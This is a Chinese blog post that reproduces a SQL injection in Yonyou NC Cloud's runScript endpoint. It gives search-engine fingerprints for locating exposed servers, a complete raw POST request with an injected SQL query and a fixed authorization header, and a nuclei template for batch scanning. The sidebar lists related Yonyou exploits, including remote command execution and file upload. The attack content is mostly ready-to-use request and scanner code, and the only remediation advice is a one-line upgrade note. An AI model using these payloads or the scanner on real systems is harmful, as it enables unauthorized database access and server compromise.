【漏洞复现】用友-NC-Cloud-runScript-sql注入

最新推荐文章于 2024-04-14 15:18:22 发布
最新推荐文章于 2024-04-14 15:18:22 发布
阅读量488 收藏 2
点赞数 10
文章标签: sql 数据库 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34780861/article/details/136922654
版权

更多干货POC获取,请关注公众号:如棠安全

Nx01 阅读须知

      如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

Nx02 漏洞描述

      用友-nc-cloud runscript sql注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

Nx03 系统指纹
鹰图:web.body="platform/pub/welcome.do"

fofa:body="platform/pub/welcome.do"

Nx04 产品主页

Nx05 漏洞复现

POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en
Authorization: 58e00466213416018d01d15de83b0198
Accept-Encoding: gzip

key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual

Nx06 批量验证脚本

id: yongyou-nc-cloud-runScript-sqli

info:
  name: yongyou-nc-cloud-runScript-sqli
  author: m0be1
  severity: high

http:
  - raw:
      - |
        POST /ncchr/attendScript/internal/runScript HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Accept-Language: en
        Authorization: 58e00466213416018d01d15de83b0198
        Accept-Encoding: gzip

        key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"12321")

Nx06 修复建议

联系厂商升级系统版本

更多干货POC获取,请关注公众号:如棠安全

如棠安全
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
用友U8Cloud runScript SQL注入漏洞复现(含nuclei-poc)
m0_50797689的博客
03-20 242
用友U8Cloud runScript SQL注入漏洞复现(含nuclei-poc)
用友NC Cloud runScript SQL注入漏洞复现
0xSec
03-20 560
用友NCCloud /ncchr/attendScript/internal/runScript接口处存在SQL注入漏洞,未授权的攻击者可以通过此漏洞获取数据库权限,进一步利用可导致服务器失陷。
用友NC Cloud runScript SQL注入漏洞复现_友nc cloud系统runscript存在sql注入漏洞复现
最新发布
2401_83974199的博客
04-14 376
用友NC Cloud /ncchr/attendScript/internal/runScript接口处存在SQL注入漏洞,未授权的攻击者可以通过此漏洞获取数据库权限,进一步利用可导致服务器失陷。
用友NCCloud系统runScript存在SQL注入漏洞
qq_36334672的博客
04-02 233
用友NC Cloud系统中的runScript接口被发现存在SQL注入SQL Injection)安全漏洞。攻击者通过构造恶意的输入数据,能够将非法的SQL命令插入到原本正常的数据库查询语句中,从而绕过授权机制,未经授权地直接访问、修改或删除数据库中的敏感信息。
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 786
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在。ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
漏洞复现用友NC Cloud-runScript-SQL注入漏洞
Nday_Seeker
03-20 745
用友NC Cloud系统中的runScript接口被发现存在SQL注入SQL Injection)安全漏洞。攻击者通过构造恶意的输入数据,能够将非法的SQL命令插入到原本正常的数据库查询语句中,从而绕过授权机制,未经授权地直接访问、修改或删除数据库中的敏感信息。
用友NCNC Cloud MxServlet反序列化漏洞复现
0xSec
11-15 2010
用友NCNC Cloud系统存在反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。
用友NC全产品培训课件-销售信用.ppt
03-22
用友NC全产品培训课件-销售信用.ppt
用友NC全产品培训-产品成本1.ppt
03-22
用友NC全产品培训-产品成本1.ppt
用友NC-UAP平台介绍
11-09
UAP平台介绍,产业背景、平台整体介绍、UAP平台介绍、平台性能与稳定性、平台产业链与典型客户
用友ERP-NC管理软件在集团企业财务管理中的运用最终版.pdf
11-17
用友ERP-NC管理软件在集团企业财务管理中的运用最终版.pdf
用友NC5存货核算-存货核算参数及使用概述.pdf
03-21
用友NC5存货核算-存货核算参数及使用概述.pdf用友NC5存货核算-存货核算参数及使用概述.pdf用友NC5存货核算-存货核算参数及使用概述.pdf用友NC5存货核算-存货核算参数及使用概述.pdf用友NC5存货核算-存货核算参数及...
用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录
kelenwait的博客
06-23 7565
简介 用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。 漏洞情况 用友OA_U8 存在SQL 注入 用友NCCloud FS文件管理 SQL 注入 用友NC bsh.servlet.BshServlet 远程命令执行 用友NC 任意文件上传 getShell 漏洞复现 1.用友 OA_U8 SQL 注入 poc /yyoa/common/js/menu/tes
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8854
用友NC 漏洞汇总
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 9833
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友NC Cloud存在前台远程命令执行漏洞
holyxp的博客
07-22 506
用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
CNVD-2021-30167 用友NC命令执行漏洞复现
weixin_42345596的博客
07-16 4230
CNVD-2021-30167 用友NC命令执行漏洞复现 1.漏洞描述 该漏洞为远程命令执行漏洞,由于用友NC对外开放了BeanShell接口,攻击者可以在无需经过身份验证的情况下直接访问该接口,并构造恶意数据执行任意命令,攻击成功可获得目标服务器权限。 2.影响版本 用友NC: 6.5 3.复现过程 在线环境 无需登录,通过poc(验证性测试)URL访问测试接口 /servlet/~ic/bsh.servlet.BshServlet 这里本来想上线一下,进去看看,没想到是个国内的服务器,那可不
用友GRP-U8高校内控管理软件 漏洞
07-28
引用\[1\]: 用友GRP-U8R10行政事业财务管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。\[1\]该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。\[3\]因此,用友GRP-U8高校内控管理软件也可能存在类似的漏洞。请及时更新软件版本或采取其他安全措施以防止潜在的攻击。 #### 引用[.reference_title] - *1* [用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用](https://blog.csdn.net/qq_41904294/article/details/129693405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值